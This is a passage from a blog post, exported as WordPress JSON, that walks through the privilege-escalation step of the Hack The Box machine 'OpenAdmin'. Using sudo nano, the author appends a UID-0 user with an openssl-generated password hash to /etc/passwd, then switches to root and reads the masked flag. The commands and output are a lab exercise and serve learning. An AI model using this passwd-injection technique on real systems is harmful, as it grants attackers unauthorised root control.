Ancak daha sonra nano'nun i\u00e7indeyken \/etc\/passwd dosyas\u0131n\u0131 a.mas\u0131n\u0131 istedim ve son sat\u0131r\u0131na a\u015fa\u011f\u0131daki eklemeyi yapt\u0131mm.<\/p>\n<pre><code class=\"language-sh\">joanna@openadmin:~$ sudo \/bin\/nano \/opt\/priv\njoanna@openadmin:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd\/netif:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd 
Resolver,,,:\/run\/systemd\/resolve:\/usr\/sbin\/nologin\nsyslog:x:102:106::\/home\/syslog:\/usr\/sbin\/nologin\nmessagebus:x:103:107::\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:104:65534::\/nonexistent:\/usr\/sbin\/nologin\nlxd:x:105:65534::\/var\/lib\/lxd\/:\/bin\/false\nuuidd:x:106:110::\/run\/uuidd:\/usr\/sbin\/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\nlandscape:x:108:112::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:109:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:110:65534::\/run\/sshd:\/usr\/sbin\/nologin\njimmy:x:1000:1000:jimmy:\/home\/jimmy:\/bin\/bash\nmysql:x:111:114:MySQL Server,,,:\/nonexistent:\/bin\/false\njoanna:x:1001:1001:,,,:\/home\/joanna:\/bin\/bash\nuser:$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms\/:0:0:root:\/root:\/bin\/bash\n<\/code><\/pre>\n<p>I used openssl to generate the password field.<\/p>\n<pre><code class=\"language-sh\">\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/OpenAdmin]\n\u2514\u2500# openssl passwd -1 \nPassword: \nVerifying - Password: \n$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms\/\n<\/code><\/pre>\n<pre><code class=\"language-sh\">joanna@openadmin:~$ su user\nPassword: \nroot@openadmin:\/home\/joanna# id\nuid=0(root) gid=0(root) groups=0(root)\nroot@openadmin:\/home\/joanna# cd \/root\nroot@openadmin:~# ls\nroot.txt\nroot@openadmin:~# cat root.txt \n2f9******************************\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Level OS Logo OpenAdmin &#8211; HTB Easy Linux Walkthrough Let's start with an Nmap scan. [*] Scan: 9 Starting Nmap 7.91 ( https:\/\/nmap.org ) at&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/07\/18\/openadmin\/\">Read more<span class=\"screen-reader-text\">OpenAdmin<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1375","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1375","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1375"}],"version-history":[{"count":4,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1375\/revisions"}],"predecessor-version":[{"id":1870,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1375\/revisions\/1870"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1375"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1375"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1375"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}